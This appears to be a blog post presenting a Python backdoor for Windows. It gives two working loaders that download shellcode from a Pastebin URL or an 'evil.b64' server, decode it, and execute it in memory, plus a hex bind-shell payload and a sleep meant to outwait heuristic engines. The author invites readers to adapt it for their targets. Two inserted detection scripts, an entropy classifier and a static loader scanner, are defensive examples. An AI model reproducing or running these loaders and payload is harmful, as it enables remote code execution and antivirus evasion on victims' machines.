The following is a very simple backdoor I created in Python and compiled into a Windows binary using PyInstaller. The code downloads ASCII shellcode from a pastebin URL, interprets it as hex opcodes, injects it into memory, and executes it (without touching disk).
(I'm aware how primitive this is, but it got the job done)
Simply upload your shellcode to Pastebin, change the URL in the source code, and compile. Your shellcode should be in raw alphanumeric ASCII form, as follows:
fce8890000006089e531d2648b5230 8b520c8b52148b72280fb74a2631ff 31c0ac3c617c022c20c1cf0d01c7e2 f052578b52108b423c01d08b407885 c0744a01d0508b48188b582001d3e3 3c498b348b01d631ff31c0acc1cf0d 01c738e075f4037df83b7d2475e258 8b582401d3668b0c4b8b581c01d38b 048b01d0894424245b5b61595a51ff e0585f5a8b12eb865d683332000068 7773325f54684c772607ffd5b89001 000029c454506829806b00ffd55050 50504050405068ea0fdfe0ffd59731 db53680200115c89e66a10565768c2 db3767ffd5535768b7e938ffffd553 53576874ec3be1ffd5579768756e4d 61ffd56a006a0456576802d9c85fff d58b366a406800100000566a006858 a453e5ffd593536a005653576802d9 c85fffd501c329c685f675ecc3
#!/usr/bin/python
from ctypes import *
import urllib2

URL = "http://pastebin.com/raw.php?i=48k0BXpq"  # msfpayload windows/shell/bind_tcp LPORT=4444
# modify that URL for whatever shellcode you want

downloader = urllib2.urlopen(URL)           # urlopen lives in urllib2 here, not in the global namespace
paste = downloader.read()
alphanumeric = paste.replace("\r\n", "")    # strip the line breaks Pastebin inserts
shellcode = str(bytearray.fromhex(alphanumeric))  # hex text -> raw bytes; create_string_buffer wants a str, not a bytearray
array = create_string_buffer(shellcode, len(shellcode))
shell = cast(array, CFUNCTYPE(c_void_p))    # treat the buffer as a function
shell()
*see bottom for source
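Seen from the other side, what this loader depends on is a paste or web body that is really a hex- or base64-encoded binary. The classifier below is an added example, not code from this post: given a fetched body it strips line breaks the same way the loader does, tries both encodings, and scores the decoded bytes by entropy, printable ratio and the `fc e8` (cld; call) prologue that Metasploit's Windows stagers and the sample above begin with. The sample inputs are constructed (the six-byte prologue followed by SHA-256 output as high-entropy filler, not real shellcode); the function names and thresholds are my own.

```python
"""Triage a fetched text body for a hex- or base64-wrapped binary payload.

Added example for this post (not the author's code).  Function names,
thresholds and the sample inputs are constructed here.
"""
import base64
import binascii
import hashlib
import math
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_BLOB_CHARS = 32          # shorter strings are too often legitimate (hashes, tokens)
HIGH_ENTROPY_BITS = 5.5      # x86 machine code and packed data sit above this
LOW_PRINTABLE_RATIO = 0.6    # decoded text stays well above this
MSF_PROLOGUE = b"\xfc\xe8"   # cld; call: how Metasploit's Windows stagers (and the sample above) begin


def shannon_entropy(data):
    """Bits per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def try_decode(body):
    """Return (encoding, raw_bytes) if `body` is one hex or base64 blob, else (None, None).

    Line breaks and spaces are stripped first, the same normalisation the loader
    does before decoding a paste.
    """
    compact = "".join(body.split())
    if len(compact) < MIN_BLOB_CHARS:
        return None, None
    if len(compact) % 2 == 0 and HEX_RE.match(compact):
        return "hex", bytes.fromhex(compact)
    if len(compact) % 4 == 0 and B64_RE.match(compact):
        try:
            return "base64", base64.b64decode(compact, validate=True)
        except binascii.Error:
            pass
    return None, None


def assess(body):
    """Classify a body as 'text', 'encoded' (a blob that decodes to something text-like)
    or 'suspicious' (decodes to high-entropy non-printable bytes, or carries a stager prologue)."""
    encoding, raw = try_decode(body)
    if encoding is None:
        return {"encoding": None, "verdict": "text"}
    entropy = shannon_entropy(raw)
    printable = sum(chr(b) in string.printable for b in raw) / len(raw)
    prologue = raw.startswith(MSF_PROLOGUE)
    suspicious = prologue or (entropy > HIGH_ENTROPY_BITS and printable < LOW_PRINTABLE_RATIO)
    return {
        "encoding": encoding,
        "size": len(raw),
        "entropy": round(entropy, 2),
        "printable_ratio": round(printable, 2),
        "msf_prologue": prologue,
        "verdict": "suspicious" if suspicious else "encoded",
    }


# Constructed samples.  SAMPLE_RAW is NOT shellcode: the post's 6-byte prologue
# followed by SHA-256 output as high-entropy filler.
SAMPLE_RAW = bytes.fromhex("fce889000000") + b"".join(
    hashlib.sha256(b"filler%d" % i).digest() for i in range(10))
SAMPLE_HEX = SAMPLE_RAW.hex()
SAMPLE_HEX_WRAPPED = "\r\n".join(SAMPLE_HEX[i:i + 30] for i in range(0, len(SAMPLE_HEX), 30))
SAMPLE_B64 = base64.b64encode(SAMPLE_RAW).decode()
SAMPLE_TEXT = "Nothing to see here, just a paste with some notes about the meeting agenda."
SAMPLE_B64_TEXT = base64.b64encode(SAMPLE_TEXT.encode()).decode()

if __name__ == "__main__":
    for label, body in [("hex", SAMPLE_HEX), ("hex, CRLF-wrapped", SAMPLE_HEX_WRAPPED),
                        ("base64", SAMPLE_B64), ("plain text", SAMPLE_TEXT),
                        ("base64 of text", SAMPLE_B64_TEXT)]:
        print("%-18s -> %s" % (label, assess(body)))
```

The split between "encoded" and "suspicious" matters in practice: plenty of legitimate pastes are base64 or hex (certificates, keys, config dumps), so a blob on its own is a weak signal, while a blob that decodes to non-printable high-entropy bytes, or that starts with a known stager prologue, is worth pulling the fetching process for.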
I wrote another version of this script that downloads the raw shellcode data from a server that you specify, in case your target blocks Pastebin. I added base64 support and a sleep to outwait certain heuristic engines.
#!/usr/bin/python
from ctypes import *
from base64 import b64decode
from urllib import urlopen
from time import sleep

URL = "http://server.com/evil.b64"  # This should be changed to wherever you are hosting your malware package

downloader = urlopen(URL)                   # download the package
shellcode = b64decode(downloader.read())    # de-base64 the shellcode
sleep(31)                                   # avoid time-based heuristics
array = create_string_buffer(shellcode, len(shellcode))
shell = cast(array, CFUNCTYPE(c_void_p))
shell()
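In source form both variants share one fingerprint: a ctypes `create_string_buffer` handed to `cast(..., CFUNCTYPE(...))` and called, next to a network fetch, a hex or base64 decode and, in the second script, a sleep long enough to outlast a sandbox. PyInstaller executables carry the bundled script and can be unpacked back to it, so that pattern can be scanned for statically. The scanner below is an added example, not the author's code: the indicator names, regexes, 20-second sleep threshold and verdict labels are constructed, and the two inputs are constructed excerpts (one modelled on the second script above with a placeholder URL, one benign ctypes use).

```python
"""Static triage of recovered Python source for the ctypes shellcode-loader pattern.

Added example, not from the post.  Indicator names, regexes, thresholds and the
two sample sources are constructed here.
"""
import re

INDICATORS = {
    # a writable buffer filled with bytes...
    "writable_buffer":    re.compile(r"\bcreate_string_buffer\s*\("),
    # ...reinterpreted as a function pointer
    "buffer_to_function": re.compile(r"\bcast\s*\(\s*\w+\s*,\s*CFUNCTYPE\s*\("),
    # the bytes came from the network
    "remote_fetch":       re.compile(r"\burlopen\s*\(|\brequests\.get\s*\(|\burllib2?\b"),
    # and were unwrapped from a text encoding
    "decode_blob":        re.compile(r"\bb64decode\s*\(|\.fromhex\s*\(|\.decode\(\s*['\"]hex['\"]\s*\)"),
    "paste_site":         re.compile(r"pastebin\.com/raw", re.IGNORECASE),
}
SLEEP_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)")
LONG_SLEEP_SECONDS = 20  # constructed threshold: a literal sleep this long is rare in benign scripts


def scan_source(src):
    """Return a verdict plus the sorted list of indicators that fired on `src`."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(src)}
    for m in SLEEP_RE.finditer(src):
        if float(m.group(1)) >= LONG_SLEEP_SECONDS:
            hits.add("long_sleep")
            break
    executes_buffer = {"writable_buffer", "buffer_to_function"} <= hits
    if executes_buffer and hits & {"remote_fetch", "decode_blob", "paste_site"}:
        verdict = "staged_shellcode_loader"   # fetch/decode + execute: the pattern in this post
    elif executes_buffer:
        verdict = "in_memory_execution"       # executes a buffer, payload origin unclear
    else:
        verdict = "no_loader_pattern"
    return {"verdict": verdict, "indicators": sorted(hits)}


# Constructed excerpt modelled on the post's second script (placeholder URL).
SAMPLE_LOADER = '''\
from ctypes import *
from base64 import b64decode
from urllib import urlopen
from time import sleep
URL = "http://pastebin.com/raw.php?i=PLACEHOLDER"
downloader = urlopen(URL)
shellcode = b64decode(downloader.read())
sleep(31)
array = create_string_buffer(shellcode, len(shellcode))
shell = cast(array, CFUNCTYPE(c_void_p))
shell()
'''

# Constructed benign ctypes use: calls into kernel32 but never executes a buffer.
SAMPLE_BENIGN = '''\
import ctypes
from time import sleep
kernel32 = ctypes.windll.kernel32
sleep(1)
print(kernel32.GetTickCount())
'''

if __name__ == "__main__":
    for label, src in [("loader-like", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)]:
        print("%-12s -> %s" % (label, scan_source(src)))
```

The two-level verdict is deliberate: `create_string_buffer` plus `cast(..., CFUNCTYPE(...))` on its own is the core of the technique and should be reviewed wherever it turns up, while the fetch, decode, paste-site and long-sleep indicators only raise confidence that what was found is a staged loader rather than, say, a JIT experiment.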
This is not advanced, but it is effective.
Feel free to extend and modify this to fit your needs.
*Big thanks to TJ O'Connor for writing Violent Python. I highly recommend it to everyone. I took the shellcode casting portion of this code straight from his book.